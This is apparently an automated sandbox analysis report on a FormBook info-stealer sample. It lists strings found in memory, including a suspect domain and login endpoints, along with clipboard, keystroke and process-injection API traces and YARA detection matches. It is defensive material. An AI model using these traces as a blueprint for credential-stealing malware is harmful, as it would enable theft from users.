                Source: Atuserer.exe, 00000007.00000002.3165412212.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3167412341.0000000007780000.00000004.00000800.00020000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000004216000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://00808.vip/
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: Atuserer.exe, 00000007.00000003.1908966145.0000000007A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003B407C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_003B427A
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003B407C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_003A003A
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003CCB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_003CCB26

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: This is a third-party compiled AutoIt script.2_2_00343B4C
                Source: RO2Y11yOJ7.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RO2Y11yOJ7.exe, 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_33a1b54c-9
                Source: RO2Y11yOJ7.exe, 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_387471c4-e
                Source: RO2Y11yOJ7.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_82ec3c63-e
                Source: RO2Y11yOJ7.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_af3bc0f2-1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004EC823 NtClose,4_2_004EC823
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72B60 NtClose,LdrInitializeThunk,4_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F735C0 NtCreateMutant,LdrInitializeThunk,4_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F74340 NtSetContextThread,4_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F74650 NtSuspendThread,4_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72AF0 NtWriteFile,4_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72AD0 NtReadFile,4_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72AB0 NtWaitForSingleObject,4_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BF0 NtAllocateVirtualMemory,4_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BE0 NtQueryValueKey,4_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BA0 NtEnumerateValueKey,4_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72B80 NtQueryInformationFile,4_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72EE0 NtQueueApcThread,4_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72EA0 NtAdjustPrivilegesToken,4_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72E80 NtReadVirtualMemory,4_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72E30 NtWriteVirtualMemory,4_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FE0 NtCreateFile,4_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FB0 NtResumeThread,4_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FA0 NtQuerySection,4_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72F90 NtProtectVirtualMemory,4_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72F60 NtCreateProcessEx,4_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72F30 NtCreateSection,4_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CF0 NtOpenProcess,4_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CC0 NtQueryVirtualMemory,4_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CA0 NtQueryInformationToken,4_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72C70 NtFreeVirtualMemory,4_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72C60 NtCreateKey,4_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72C00 NtQueryInformationProcess,4_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72DD0 NtDelayExecution,4_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72DB0 NtEnumerateKey,4_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D30 NtUnmapViewOfSection,4_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D10 NtMapViewOfSection,4_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D00 NtSetInformationFile,4_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73090 NtSetValueKey,4_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73010 NtOpenDirectoryObject,4_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F739B0 NtGetContextThread,4_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73D70 NtOpenThread,4_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73D10 NtOpenProcessToken,4_2_02F73D10
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F4650 NtSuspendThread,LdrInitializeThunk,7_2_048F4650
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F4340 NtSetContextThread,LdrInitializeThunk,7_2_048F4340
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_048F2CA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2C60 NtCreateKey,LdrInitializeThunk,7_2_048F2C60
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_048F2C70
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2DD0 NtDelayExecution,LdrInitializeThunk,7_2_048F2DD0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_048F2DF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_048F2D10
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_048F2D30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_048F2E80
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_048F2EE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2FB0 NtResumeThread,LdrInitializeThunk,7_2_048F2FB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2FE0 NtCreateFile,LdrInitializeThunk,7_2_048F2FE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2F30 NtCreateSection,LdrInitializeThunk,7_2_048F2F30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2AD0 NtReadFile,LdrInitializeThunk,7_2_048F2AD0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2AF0 NtWriteFile,LdrInitializeThunk,7_2_048F2AF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_048F2BA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_048F2BE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_048F2BF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2B60 NtClose,LdrInitializeThunk,7_2_048F2B60
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F35C0 NtCreateMutant,LdrInitializeThunk,7_2_048F35C0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F39B0 NtGetContextThread,LdrInitializeThunk,7_2_048F39B0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CC0 NtQueryVirtualMemory,7_2_048F2CC0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CF0 NtOpenProcess,7_2_048F2CF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2C00 NtQueryInformationProcess,7_2_048F2C00
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2DB0 NtEnumerateKey,7_2_048F2DB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2D00 NtSetInformationFile,7_2_048F2D00
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2EA0 NtAdjustPrivilegesToken,7_2_048F2EA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2E30 NtWriteVirtualMemory,7_2_048F2E30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2F90 NtProtectVirtualMemory,7_2_048F2F90
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2FA0 NtQuerySection,7_2_048F2FA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2F60 NtCreateProcessEx,7_2_048F2F60
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2AB0 NtWaitForSingleObject,7_2_048F2AB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2B80 NtQueryInformationFile,7_2_048F2B80
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3090 NtSetValueKey,7_2_048F3090
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3010 NtOpenDirectoryObject,7_2_048F3010
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3D10 NtOpenProcessToken,7_2_048F3D10
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3D70 NtOpenThread,7_2_048F3D70
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00848F90 NtCreateFile,7_2_00848F90
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008491F0 NtDeleteFile,7_2_008491F0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00849100 NtReadFile,7_2_00849100
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008492A0 NtClose,7_2_008492A0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00849400 NetpMergeFtinfo,NtAllocateVirtualMemory,7_2_00849400
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,2_2_003AA279
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003988D9 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,2_2_003988D9
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_003A5264
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034E8002_2_0034E800
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036DAF52_2_0036DAF5
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034E0602_2_0034E060
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003541402_2_00354140
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003623452_2_00362345
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C04652_2_003C0465
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003764522_2_00376452
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034C5B12_2_0034C5B1
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003725AE2_2_003725AE
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036277A2_2_0036277A
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003568412_2_00356841
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C08E22_2_003C08E2
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A89322_2_003A8932
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0039E9282_2_0039E928
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0037890F2_2_0037890F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003589682_2_00358968
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003769C42_2_003769C4
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036CCA12_2_0036CCA1
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00376F362_2_00376F36
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003570FE2_2_003570FE
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003531902_2_00353190
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003412872_2_00341287
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003633072_2_00363307
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036F3592_2_0036F359
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003616042_2_00361604
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003556802_2_00355680
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003678132_2_00367813
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003558C02_2_003558C0
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00361AF82_2_00361AF8
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00379C352_2_00379C35
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C7E0D2_2_003C7E0D
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034FE402_2_0034FE40
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036BF262_2_0036BF26
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00361F102_2_00361F10
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_024E36102_2_024E3610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D88734_2_004D8873
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C110A4_2_004C110A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C11104_2_004C1110
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C29954_2_004C2995
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C29A04_2_004C29A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D01B34_2_004D01B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D6A4D4_2_004D6A4D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D6AC34_2_004D6AC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C32F04_2_004C32F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D6ABE4_2_004D6ABE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D03D34_2_004D03D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C244D4_2_004C244D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C24504_2_004C2450
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004CE4534_2_004CE453
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C1C2B4_2_004C1C2B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C1C304_2_004C1C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004EEE134_2_004EEE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C26204_2_004C2620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C2E344_2_004C2E34
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C2E304_2_004C2E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC02C04_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE02744_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030003E64_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E3F04_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFA3524_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030001AA4_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD20004_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF81CC4_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF41A24_2_02FF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC81584_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDA1184_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F301004_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5C6E04_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3C7C04_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F407704_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F647504_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEE4F64_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030005914_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF24464_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE44204_2_02FE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F405354_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA804_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF6BD74_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFAB404_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E8F04_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F268B84_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0300A9A64_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4A8404_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F428404_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A04_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F569624_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFEEDB4_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52E904_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFCE934_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40E594_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFEE264_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4CFE04_2_02F4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F32FC84_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBEFA04_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB4F404_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F60F304_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE2F304_2_02FE2F30
